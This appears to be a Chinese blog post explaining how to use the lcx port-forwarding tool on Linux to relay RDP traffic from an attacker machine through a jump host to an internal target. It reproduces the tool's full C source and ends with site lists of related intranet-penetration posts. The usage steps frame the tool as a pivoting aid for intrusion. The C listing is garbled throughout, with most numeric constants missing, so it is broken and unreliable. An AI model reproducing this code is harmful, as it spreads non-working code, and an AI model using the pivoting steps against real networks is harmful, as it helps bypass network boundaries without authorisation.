lcx端口转发 linux版
一、端口转发使用
1、攻击机上执行以下命令
./lcx -p1 -p2 -m
在本地监听3389端口,并将发送到本机3389端口的数据传递到本机2222端口
2、跳板机上执行以下命令
./lcx -h1 attackip -p1 -h2 dstip -p2 -m
与攻击机建立连接,并将来自攻击机2222端口的数据全部转发到目标机端口的3389 端口
3、以上连接建立完成后,就可以通过连接攻击机的3389端口,进行访问目标机的3389端口
二、代码
/* Socket data transport tool
* by bkbll(bkbll@cnhonker.net)
* [bkbll@mobile socket]$ uname -a
* Linux mobile 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
* [bkbll@mobile socket]$ gcc -o trtool trtool.c
* [bkbll@mobile socket]$ ./trtool
* Socket data transport tool
* by bkbll(bkbll@cnhonker.net)
* Usage:./trtool -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename]
* -v: version
* -h1: host1
* -h2: host2
* -p1: port1
* -p2: port2
* -log: log the data
* -m: the action method for this tool
* 1: listen on PORT1 and connect to HOST2:PORT2
* 2: listen on PORT1 and PORT2
* 3: connect to HOST1:PORT1 and HOST2:PORT2
*/
#include <sys/time.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <netdb.h> #define VERSION "2.2"
#define TIMEOUT 300
#define max(a,b) (a)>(b)?(a):(b)
#define MAXSIZE 10240
#define HOSTLEN 40
#define CONNECT_NUMBER 5 /* define function here */
void usage(char *s);
void transdata(int fd1,int fd2);
void closeallfd(int);
void makelog(char *buffer,int length);
int testifisvalue(char *str);
int bind2conn(int port1,char *host,int port2);
int bind2bind(int port1,int port2);
int conn2conn(char *host1,int port1,char *host2,int port2);
int create_socket();
int create_serv(int sockfd,int port);
int client_connect(int sockfd,char* server,int port); /* define GLOBAL varible here */
extern int errno;
FILE *fp; int main(int argc,char **argv)
{
char **p;
char host1[HOSTLEN],host2[HOSTLEN];
int port1=,port2=,method=;
int length;
char *logfile=NULL; p=argv;
memset(host1,,HOSTLEN);
memset(host2,,HOSTLEN);
while(*p)
{
if(strcmp(*p,"-v")==)
{
printf("Socket data transport tool.\r\nVersion:%s\r\n",VERSION);
p++;
continue;
}
if(strcmp(*p,"-h1")==)
{
if(testifisvalue(*(p+))==)
{
length=(strlen(*(p+))>HOSTLEN-)?HOSTLEN-:strlen(*(p+));
strncpy(host1,*(++p),length);
}
p++;
continue;
}
if(strcmp(*p,"-h2")==)
{
if(testifisvalue(*(p+))==)
{
length=(strlen(*(p+))>HOSTLEN-)?HOSTLEN-:strlen(*(p+));
strncpy(host2,*(++p),length);
}
p++;
continue;
}
if(strcmp(*p,"-p1")==)
{
if(testifisvalue(*(p+))==)
port1=atoi(*(++p));
p++;
continue;
}
if(strcmp(*p,"-p2")==)
{
if(testifisvalue(*(p+))==)
port2=atoi(*(++p));
p++;
continue;
}
if(strcmp(*p,"-m")==)
{
if(testifisvalue(*(p+))==)
method=atoi(*(++p));
p++;
continue;
}
if(strcmp(*p,"-log")==)
{
if(testifisvalue(*(p+))==)
logfile=*(++p);
else
{
printf("[ERROR]:must supply logfile name\r\n");
exit();
}
p++;
continue;
}
p++;
}
signal(SIGCLD,SIG_IGN);
signal(SIGINT,&closeallfd);
if(logfile !=NULL)
{
fp=fopen(logfile,"a");
if(fp == NULL )
{
perror("open logfile");
exit();
}
}
makelog("######################## start ################\r\n",);
switch(method)
{
case :
usage(argv[]);
break;
case :
if((port1==) || (port2==))
{
printf("[ERROR]:must supply PORT1 and PORT2.\r\n");
break;
}
if(strlen(host2)==)
{
printf("[ERROR]:must supply HOST2.\r\n");
break;
}
bind2conn(port1,host2,port2);
break;
case :
if((port1==) || (port2==))
{
printf("[ERROR]:must supply PORT1 and PORT2.\r\n");
break;
}
bind2bind(port1,port2);
break;
case :
if((port1==) || (port2==))
{
printf("[ERROR]:must supply PORT1 and PORT2.\r\n");
break;
}
if(strlen(host1)==)
{
printf("[ERROR]:must supply HOST1.\r\n");
break;
}
if(strlen(host2)==)
{
printf("[ERROR]:must supply HOST2.\r\n");
break;
}
conn2conn(host1,port1,host2,port2);
break;
default:
usage(argv[]);
}
closeallfd();
} int testifisvalue(char *str)
{
if(str == NULL ) return();
if(str[]=='-') return();
return();
} void usage(char *s)
{
printf("Socket data transport tool\r\n");
printf("by bkbll(bkbll@cnhonker.net)\r\n\r\n");
printf("Usage:%s -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename]\r\n",s);
printf(" -v: version\r\n");
printf(" -h1: host1\r\n");
printf(" -h2: host2\r\n");
printf(" -p1: port1\r\n");
printf(" -p2: port2\r\n");
printf(" -log: log the data\r\n");
printf(" -m: the action method for this tool\r\n");
printf(" 1: listen on PORT1 and connect to HOST2:PORT2\r\n");
printf(" 2: listen on PORT1 and PORT2\r\n");
printf(" 3: connect to HOST1:PORT1 and HOST2:PORT2\r\n"); closeallfd();
} int bind2conn(int port1,char *host,int port2)
{
int sockfd,sockfd1,sockfd2;
struct sockaddr_in remote;
int size;
int pid;
char buffer[]; memset(buffer,,);
if((sockfd=create_socket())==) exit();
if(create_serv(sockfd,port1)==)
{
close(sockfd1);
exit();
}
size=sizeof(struct sockaddr);
while()
{
printf("waiting for response.........\n");
if((sockfd1=accept(sockfd,(struct sockaddr *)&remote,(socklen_t *)&size))<)
{
perror("accept error\n");
continue;
}
printf("accept a client from %s:%d\n",inet_ntoa(remote.sin_addr),ntohs(remote.sin_port));
if((sockfd2=create_socket())==)
{
close(sockfd1);
continue;
}
printf("make a connection to %s:%d....",host,port2);
fflush(stdout);
if(client_connect(sockfd2,host,port2)==)
{
close(sockfd2);
sprintf(buffer,"[SERVER]connection to %s:%d error\r\n",host,port2);
write(sockfd1,buffer,strlen(buffer));
memset(buffer,,);
close(sockfd1);
continue;
}
printf("ok\r\n");
pid=fork();
if(pid==) transdata(sockfd1,sockfd2);
// sleep(2);
close(sockfd1);
close(sockfd2);
} } int bind2bind(int port1,int port2)
{
int fd1,fd2,sockfd1,sockfd2;
struct sockaddr_in client1,client2;
int size1,size2;
int pid; if((fd1=create_socket())==) exit();
if((fd2=create_socket())==) exit();
printf("binding port %d......",port1);
fflush(stdout);
if(create_serv(fd1,port1)==)
{
close(fd1);
exit();
}
printf("ok\r\n");
printf("binding port %d......",port2);
fflush(stdout);
if(create_serv(fd2,port2)==)
{
close(fd2);
exit();
}
printf("ok\r\n");
size1=size2=sizeof(struct sockaddr);
while()
{
printf("waiting for response on port %d.........\n",port1);
if((sockfd1=accept(fd1,(struct sockaddr *)&client1,(socklen_t *)&size1))<)
{
perror("accept1 error");
continue;
}
printf("accept a client on port %d from %s,waiting another on port %d....\n",port1,inet_ntoa(client1.sin_addr),port2);
if((sockfd2=accept(fd2,(struct sockaddr *)&client2,(socklen_t *)&size2))<)
{
perror("accept2 error");
close(sockfd1);
continue;
}
printf("accept a client on port %d from %s\n",port2,inet_ntoa(client2.sin_addr));
pid=fork();
if(pid==) transdata(sockfd1,sockfd2);
//sleep(2);
close(sockfd1);
close(sockfd2);
}
} int conn2conn(char *host1,int port1,char *host2,int port2)
{
int sockfd1,sockfd2;
int pid;
fd_set fds;
int l;
int result;
char buffer[MAXSIZE]; while()
{
if((sockfd1=create_socket())==) exit();
if((sockfd2=create_socket())==) exit();
printf("[+] make a connection to %s:%d....\r\n",host1,port1);
fflush(stdout);
if(client_connect(sockfd1,host1,port1)==)
{
printf("[-] connect to host1 failed\r\n");
close(sockfd1);
close(sockfd2);
continue;
}
printf("[+] host1 connected\r\n");
l=;
memset(buffer,,MAXSIZE);
//fixed by Twi1ight 2012.09.12
while()
{
FD_ZERO(&fds);
FD_SET(sockfd1, &fds);
if (select(sockfd1+, &fds, NULL, NULL, NULL) < )
{
if (errno == EINTR) continue;
break;
} if (FD_ISSET(sockfd1, &fds))
{
l=read(sockfd1, buffer, MAXSIZE);
break;
}
sleep();
}
if(l<=)
{
printf("[-] there is a error...Create a new connection.\r\n");
continue;
}
while()
{
printf("[+] make a connection to %s:%d....\r\n",host2,port2);
fflush(stdout);
if(client_connect(sockfd2,host2,port2)==)
{
printf("[-] connect to host2 failed\r\n");
close(sockfd1);
close(sockfd2);
continue;
}
if(write(sockfd2,buffer,l) < )
{
printf("[-] send failed.\r\n");
continue;
}
l=;
memset(buffer,,MAXSIZE);
break;
}
printf("[+] all hosts connected!\r\n");
pid=fork();
if(pid==) transdata(sockfd1,sockfd2);
//sleep(2);
close(sockfd1);
close(sockfd2);
}
} void transdata(int fd1,int fd2)
{
struct timeval timeset;
fd_set readfd,writefd;
int result,i=;
char read_in1[MAXSIZE],send_out1[MAXSIZE];
char read_in2[MAXSIZE],send_out2[MAXSIZE];
int read1=,totalread1=,send1=;
int read2=,totalread2=,send2=;
int sendcount1,sendcount2;
int maxfd;
struct sockaddr_in client1,client2;
int structsize1,structsize2;
char host1[],host2[];
int port1=,port2=;
char tmpbuf1[],tmpbuf2[]; memset(host1,,);
memset(host2,,);
memset(tmpbuf1,,);
memset(tmpbuf2,,);
if(fp!=NULL)
{
structsize1=sizeof(struct sockaddr);
structsize2=sizeof(struct sockaddr);
if(getpeername(fd1,(struct sockaddr *)&client1,(socklen_t *)&structsize1)<)
{
strcpy(host1,"fd1");
}
else
{
printf("got,ip:%s,port:%d\r\n",inet_ntoa(client1.sin_addr),ntohs(client1.sin_port));
strcpy(host1,inet_ntoa(client1.sin_addr));
port1=ntohs(client1.sin_port);
}
if(getpeername(fd2,(struct sockaddr *)&client2,(socklen_t *)&structsize2)<)
{
strcpy(host2,"fd2");
}
else
{
printf("got,ip:%s,port:%d\r\n",inet_ntoa(client2.sin_addr),ntohs(client2.sin_port));
strcpy(host2,inet_ntoa(client2.sin_addr));
port2=ntohs(client2.sin_port);
}
sprintf(tmpbuf1,"\r\n########### read from %s:%d ####################\r\n",host1,port1);
sprintf(tmpbuf2,"\r\n########### reply from %s:%d ####################\r\n",host2,port2);
} maxfd=max(fd1,fd2)+;
memset(read_in1,,MAXSIZE);
memset(read_in2,,MAXSIZE);
memset(send_out1,,MAXSIZE);
memset(send_out2,,MAXSIZE); timeset.tv_sec=TIMEOUT;
timeset.tv_usec=;
while()
{
FD_ZERO(&readfd);
FD_ZERO(&writefd); FD_SET(fd1,&readfd);
FD_SET(fd1,&writefd);
FD_SET(fd2,&writefd);
FD_SET(fd2,&readfd); result=select(maxfd,&readfd,&writefd,NULL,×et);
if((result<) && (errno!=EINTR))
{
perror("select error");
break;
}
else if(result==)
{
printf("time out\n");
break;
}
if(FD_ISSET(fd1,&readfd))
{
/* 不能超过MAXSIZE-totalread1,不然send_out1会溢出 */
if(totalread1<MAXSIZE)
{
read1=read(fd1,read_in1,MAXSIZE-totalread1);
if(read1==) break;
if((read1<) && (errno!=EINTR))
{
perror("read data error");
break;
}
memcpy(send_out1+totalread1,read_in1,read1);
makelog(tmpbuf1,strlen(tmpbuf1));
makelog(read_in1,read1);
totalread1+=read1;
memset(read_in1,,MAXSIZE);
}
}
if(FD_ISSET(fd2,&writefd))
{
int err=;
sendcount1=;
while(totalread1>)
{
send1=write(fd2,send_out1+sendcount1,totalread1);
if(send1==)break;
if((send1<) && (errno!=EINTR))
{
perror("unknow error");
err=;
break;
}
if((send1<) && (errno==ENOSPC)) break;
sendcount1+=send1;
totalread1-=send1;
}
if(err==) break;
if((totalread1>) && (sendcount1>))
{
/* 移动未发送完的数据到开始 */
memcpy(send_out1,send_out1+sendcount1,totalread1);
memset(send_out1+totalread1,,MAXSIZE-totalread1);
}
else
memset(send_out1,,MAXSIZE);
}
if(FD_ISSET(fd2,&readfd))
{ if(totalread2<MAXSIZE)
{
read2=read(fd2,read_in2,MAXSIZE-totalread2);
if(read2==)break;
if((read2<) && (errno!=EINTR))
{
perror("read data error");
break;
}
memcpy(send_out2+totalread2,read_in2,read2);
makelog(tmpbuf2,strlen(tmpbuf2));
makelog(read_in2,read2);
totalread2+=read2;
memset(read_in2,,MAXSIZE);
}
}
if(FD_ISSET(fd1,&writefd))
{
int err2=;
sendcount2=;
while(totalread2>)
{
send2=write(fd1,send_out2+sendcount2,totalread2);
if(send2==)break;
if((send2<) && (errno!=EINTR))
{
perror("unknow error");
err2=;
break;
}
if((send2<) && (errno==ENOSPC)) break;
sendcount2+=send2;
totalread2-=send2;
}
if(err2==) break;
if((totalread2>) && (sendcount2 > ))
{
/* 移动未发送完的数据到开始 */
memcpy(send_out2,send_out2+sendcount2,totalread2);
memset(send_out2+totalread2,,MAXSIZE-totalread2);
}
else
memset(send_out2,,MAXSIZE);
}
} close(fd1);
close(fd2);
printf("ok,I closed the two fd\r\n");
//exit(0);
} void closeallfd(int n)
{
int i;
printf("Let me exit...");
fflush(stdout);
for(i=;i<;i++)
{
close(i);
}
if(fp != NULL)
{
fprintf(fp,"exited\r\n");
fclose(fp);
}
printf("all overd\r\n");
exit();
}
void makelog(char *buffer,int length)
{
if(fp !=NULL)
{
//fprintf(fp,"%s",buffer);
write(fileno(fp),buffer,length);
fflush(fp);
}
} int create_socket()
{
int sockfd; sockfd=socket(AF_INET,SOCK_STREAM,);
if(sockfd<)
{
perror("create socket error");
return();
}
return(sockfd);
} int create_serv(int sockfd,int port)
{
struct sockaddr_in srvaddr;
int on=; bzero(&srvaddr,sizeof(struct sockaddr));
srvaddr.sin_port=htons(port);
srvaddr.sin_family=AF_INET;
srvaddr.sin_addr.s_addr=htonl(INADDR_ANY); setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR,&on,sizeof(on)); //so I can rebind the port
if(bind(sockfd,(struct sockaddr *)&srvaddr,sizeof(struct sockaddr))<)
{
perror("error");
return();
}
if(listen(sockfd,CONNECT_NUMBER)<)
{
perror("listen error\n");
return();
}
return();
} int client_connect(int sockfd,char* server,int port)
{
struct sockaddr_in cliaddr;
struct hostent *host; if(!(host=gethostbyname(server)))
{
printf("gethostbyname(%s) error:%s\n",server,strerror(errno));
return();
} bzero(&cliaddr,sizeof(struct sockaddr));
cliaddr.sin_family=AF_INET;
cliaddr.sin_port=htons(port);
cliaddr.sin_addr=*((struct in_addr *)host->h_addr); if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<)
{
perror("[-] error");
return();
}
return();
}
lcx端口转发 linux版的更多相关文章
- [内网渗透]lcx端口转发
0x01 简介 lcx是一款端口转发工具,有三个功能: 第一个功能将本地端口转发到远程主机某个端口上 第二个功能将本地端口转发到本地另一个端口上 第三个功能是进行监听并进行转发使用 Lcx使用的前提是 ...
- LCX端口转发实现内网突破
工具:lcx.exe 原理:当目标主机仅开放了web服务,而该服务又仅能供内网用户使用,外网用户根本无法直接访问.因此想要让外网用户能能够访问局域网中的系统服务,必须进行端口映射等操作才行.其原理就是 ...
- lcx 端口转发
1.查看3389端口开放情况: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStati ...
- lcx端口转发
目录 0x01 正向端口转发 0x02 反向端口转发 0x03 msf正向shell 0x04 msf反向shell 注: 边界机器 win08 192.168.222.175 内网机器 win7 1 ...
- linux下内网端口转发工具:linux版lcx [实现远程内网维护]
这个工具以前使用的初衷是内网渗透,需要将内网ssh端口转发到外网服务器上.但这个工具同样适用于运维工程师进行远程内网维护. 当然这一切的前提是内网可以访问外网,检测方法当然就是直接ping 一个外网I ...
- 端口转发 Port Forwarding (一)
0x00First 最近发现一些好用的端口转发工具和技巧,计划认真梳理一下 SSH.NC.LCX.EW.FRP 0x01 SSH隧道端口转发 目前利用SSH隧道(SSH tunneling)进行端口转 ...
- Linux-Windows 端口转发
在实际的生产环境中,我们为了安全性,会将一些重要的服务(数据库服务)不开放外网访问,但是当我们某个时刻由于一些特殊需求,需要进行外网访问的时候,我们可以通过端口转发来实现.通过一台和与服务可以互相访问 ...
- [转帖]Linux-Windows 端口转发 netsh 还有 rinetd
Linux-Windows 端口转发 https://www.cnblogs.com/operationhome/p/11284559.html 之前自己学习过 netsh 也曾经用过frp 这次学习 ...
- JSP版LCX:端口转发神器 KPortTran
最近接触内网很多,渗透过程中,由于windows和linux的差别以及运行语言环境的限制导致端口转发经常出现问题.于是自己写了个简单的JSP的端口转发脚本.仿造LCX的功能,具有正向.反向.监听三种模 ...
随机推荐
- java中内部类的积累
放在一个类的内部的类我们就叫内部类. 二. 作用 1.内部类可以很好的实现隐藏 一般的非内部类,是不允许有 private 与protected权限的,但内部类可以 2.内部类拥有外围类的所有元素的访 ...
- Docker-docker制作镜像
一.下载镜像 a.以daocloud为mirror下载Nginx镜像 配置daocloud为mirror,下载Nginx镜像:(daocloud官网登陆后,发现镜像里找到Nginx镜像) 下载Ngin ...
- C++开学第二次作业(5.14)
开学第二次作业(5.14) 代码传送门 题目 给定一个常数K以及一个单链表L,请编写程序将L中每K个结点反转.例如:给定L为1→2→3→4→5→6,K为3,则输出应该为3→2→1→6→5→4:如果K为 ...
- git重命名分支名
git branch -m old_branch_name new_branch_name
- elasticsearch系列(三)库表理解
首先ES没有库和表的概念,只有index,type,document(详细术语可以看ES的系列一 http://www.cnblogs.com/ulysses-you/p/6736926.html), ...
- Dokcer ELK
使用 docker 搭建 ELK 非常简单 docker run --name myes -d -p 9200:9200 -p 9300:9300 elasticsearch:2.4.4 运行 ...
- POJ 2299 Ultra-QuickSort(树状数组+离散化)
http://poj.org/problem?id=2299 题意:给出一组数,求逆序对. 思路: 这道题可以用树状数组解决,但是在此之前,需要对数据进行一下预处理. 这道题目的数据可以大到999,9 ...
- checkbox及css实现点击下拉菜单
面试遇到的问题.用checkbox中的:checked伪类选择器实现. 通过label标签来触发checkbox的unchecked 和checked两种状态:用css普通同胞选择器 ~.另外补充一点 ...
- sublime的一些插件
新安装的sublime缺少一些插件… 1.文件路径没有提示 ctrl+shift+p → install → autofilename 2..html后缀的文件中,使用快捷键!不能自动出现内容 ctr ...
- 高质量的C++博客
陈硕 :http://blog.csdn.net/Solstice 孟岩: http://blog.csdn.net/myan